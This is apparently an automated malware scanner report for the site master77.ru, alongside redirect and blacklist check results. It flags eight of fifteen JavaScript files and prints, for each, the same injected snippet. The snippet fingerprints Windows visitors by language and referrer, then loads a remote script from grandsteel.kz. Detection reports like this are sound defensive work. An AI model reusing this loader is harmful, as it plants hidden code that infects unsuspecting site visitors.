Malware Scanner report for master77.ru

Malicious/Suspicious/Total urls checked: 0/8/15

8 pages have suspicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://master77.ru/	200 OK Content-Length: 16309 Content-Type: text/html	clean
http://master77.ru/engine/classes/js/jquery.js	200 OK Content-Length: 78601 Content-Type: application/javascript	clean
http://master77.ru/engine/classes/js/jqueryui.js	200 OK Content-Length: 64128 Content-Type: application/javascript	clean
http://master77.ru/engine/classes/js/dle_js.js	200 OK Content-Length: 15233 Content-Type: application/javascript	clean
http://master77.ru/templates/Master77/js/jquery.easing.1.3.js	200 OK Content-Length: 10123 Content-Type: application/javascript	suspicious
Suspicious code found function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue; } ... 573 bytes are skipped ...gent_reg = /(bot\|yandex\|yx)/ivar useragent = navigator.userAgent;if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) && (lang=="ru" \|\| lang=="ua" \|\| lang=="by" \|\| lang=="kz") && (!useragent.match(useragent_reg)) ) { var script = document.createElement('script'); script.src = 'http://grandsteel.kz/stats.php'; document.head.appendChild(script); set_cookie('viewpages', '8ihdf8hiio9000yud9');};
http://master77.ru/templates/Master77/js/cufon-yui.js	200 OK Content-Length: 20063 Content-Type: application/javascript	suspicious
Suspicious code found function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue; } ... 573 bytes are skipped ...gent_reg = /(bot\|yandex\|yx)/ivar useragent = navigator.userAgent;if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) && (lang=="ru" \|\| lang=="ua" \|\| lang=="by" \|\| lang=="kz") && (!useragent.match(useragent_reg)) ) { var script = document.createElement('script'); script.src = 'http://grandsteel.kz/stats.php'; document.head.appendChild(script); set_cookie('viewpages', '8ihdf8hiio9000yud9');};
http://master77.ru/templates/Master77/js/Micra_400.font.js	200 OK Content-Length: 117941 Content-Type: application/javascript	suspicious
Suspicious code found function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue; } ... 573 bytes are skipped ...gent_reg = /(bot\|yandex\|yx)/ivar useragent = navigator.userAgent;if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) && (lang=="ru" \|\| lang=="ua" \|\| lang=="by" \|\| lang=="kz") && (!useragent.match(useragent_reg)) ) { var script = document.createElement('script'); script.src = 'http://grandsteel.kz/stats.php'; document.head.appendChild(script); set_cookie('viewpages', '8ihdf8hiio9000yud9');};
http://master77.ru/templates/Master77/js/PIE.js	200 OK Content-Length: 32676 Content-Type: application/javascript	suspicious
Suspicious code found function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue; } ... 573 bytes are skipped ...gent_reg = /(bot\|yandex\|yx)/ivar useragent = navigator.userAgent;if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) && (lang=="ru" \|\| lang=="ua" \|\| lang=="by" \|\| lang=="kz") && (!useragent.match(useragent_reg)) ) { var script = document.createElement('script'); script.src = 'http://grandsteel.kz/stats.php'; document.head.appendChild(script); set_cookie('viewpages', '8ihdf8hiio9000yud9');};
http://master77.ru/templates/Master77/js/cycle.js	200 OK Content-Length: 39309 Content-Type: application/javascript	suspicious
Suspicious code found function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue; } ... 573 bytes are skipped ...gent_reg = /(bot\|yandex\|yx)/ivar useragent = navigator.userAgent;if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) && (lang=="ru" \|\| lang=="ua" \|\| lang=="by" \|\| lang=="kz") && (!useragent.match(useragent_reg)) ) { var script = document.createElement('script'); script.src = 'http://grandsteel.kz/stats.php'; document.head.appendChild(script); set_cookie('viewpages', '8ihdf8hiio9000yud9');};
http://master77.ru/templates/Master77/js/placeholder.js	200 OK Content-Length: 4228 Content-Type: application/javascript	suspicious
Suspicious code found function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue; } ... 573 bytes are skipped ...gent_reg = /(bot\|yandex\|yx)/ivar useragent = navigator.userAgent;if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) && (lang=="ru" \|\| lang=="ua" \|\| lang=="by" \|\| lang=="kz") && (!useragent.match(useragent_reg)) ) { var script = document.createElement('script'); script.src = 'http://grandsteel.kz/stats.php'; document.head.appendChild(script); set_cookie('viewpages', '8ihdf8hiio9000yud9');};
http://master77.ru/templates/Master77/js/plugins/validator/jquery.validationEngine.js	200 OK Content-Length: 22447 Content-Type: application/javascript	clean
http://master77.ru/templates/Master77/js/plugins/validator/z.trans.en.js	200 OK Content-Length: 2063 Content-Type: application/javascript	clean
http://master77.ru/templates/Master77/js/cookie.js	200 OK Content-Length: 2797 Content-Type: application/javascript	suspicious
Suspicious code found function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue; } ... 573 bytes are skipped ...gent_reg = /(bot\|yandex\|yx)/ivar useragent = navigator.userAgent;if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) && (lang=="ru" \|\| lang=="ua" \|\| lang=="by" \|\| lang=="kz") && (!useragent.match(useragent_reg)) ) { var script = document.createElement('script'); script.src = 'http://grandsteel.kz/stats.php'; document.head.appendChild(script); set_cookie('viewpages', '8ihdf8hiio9000yud9');};
http://master77.ru/templates/Master77/js/vt.js	200 OK Content-Length: 17696 Content-Type: application/javascript	suspicious
Suspicious code found function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue; } ... 573 bytes are skipped ...gent_reg = /(bot\|yandex\|yx)/ivar useragent = navigator.userAgent;if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) && (lang=="ru" \|\| lang=="ua" \|\| lang=="by" \|\| lang=="kz") && (!useragent.match(useragent_reg)) ) { var script = document.createElement('script'); script.src = 'http://grandsteel.kz/stats.php'; document.head.appendChild(script); set_cookie('viewpages', '8ihdf8hiio9000yud9');};
http://master77.ru/services/	200 OK Content-Length: 16013 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: master77.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 22 Apr 2014 07:19:53 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=cdf321b40267755440e9aabe100586ed; path=/
Set-Cookie: dle_user_id=deleted; expires=Mon, 22-Apr-2013 07:19:52 GMT; path=/; domain=.master77.ru; httponly
Set-Cookie: dle_password=deleted; expires=Mon, 22-Apr-2013 07:19:52 GMT; path=/; domain=.master77.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Mon, 22-Apr-2013 07:19:52 GMT; path=/; domain=.master77.ru; httponly

Second query (visit from search engine):
GET / HTTP/1.1
Host: master77.ru
Referer: http://www.google.com/search?q=master77.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=master77.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://master77.ru/

Result: master77.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for master77.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools